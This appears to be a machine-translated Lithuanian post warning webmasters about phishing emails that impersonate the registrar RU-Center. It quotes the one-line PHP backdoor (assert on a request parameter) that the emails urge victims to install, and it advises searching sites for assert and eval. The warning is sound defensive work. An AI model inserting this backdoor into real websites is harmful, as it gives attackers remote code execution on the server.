Dėmesio „žiniatinklio valdytojams“, kurie nežino PHP. Pažeidžiamumas.

Tai yra automatinis vertimas.
Spauskite čia, kad perskaitytumėte leidinį originalo kalba.

Šiandien kai kurie mano draugai gavo laiškus, tariamai iš RU -Center (didžiausias Rusijos domenų vardų registratorius) - nic.ru, su tokiu turiniu:

Laiškai buvo išsiųsti iš info@nic.technical . Laiške užpuolikai, atstovaujantys GU centro vardu, siūlo svetainėje įdėti šį kodą:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Deja, daugelis mūsų kolegų, kurie vadina save „žiniatinklio valdytojais“ (daugybė svetainių savininkų), nežino PHP ir negalvoja apie aukščiau pateikto kodo pavojus. Jei šiai funkcijai perduosite eilutę kaip parametrą, tada ji bus laikoma assert () kaip PHP kodas! Būk atsargus!

Rekomenduoju patikrinti savo php projektus, ar nėra pažeidžiamumų, naudodami komandas „assert“ arba „eval“. Jei šios komandos yra projekto kode, nepanikuokite - išstudijuokite jų algoritmą. Įgaliotas algoritmų naudojimas yra visiškai įmanomas. Atsižvelgiant į pirmiau pateiktame pavyzdyje atveju, komanda leis užpuolikai skambinti savo svetainę, pavyzdžiui, naudojant RUcenter parametrą - http://sistema-audit.ru/?RUCENTER=PHP-code

Rekomenduojame atlikti paiešką naudojant, pavyzdžiui, „Linux“ komandą grep -i -r 'assert' / home / www / mysite / *, nurodant aplanką su svetainės failais, kad būtų gautas failų, kuriuose įtartina, sąrašas pavyzdys yra naudojamas kodas.

Rūpinkitės savimi ir savo svetainėmis!

Tai yra automatinis vertimas.
Spauskite čia, kad perskaitytumėte leidinį originalo kalba.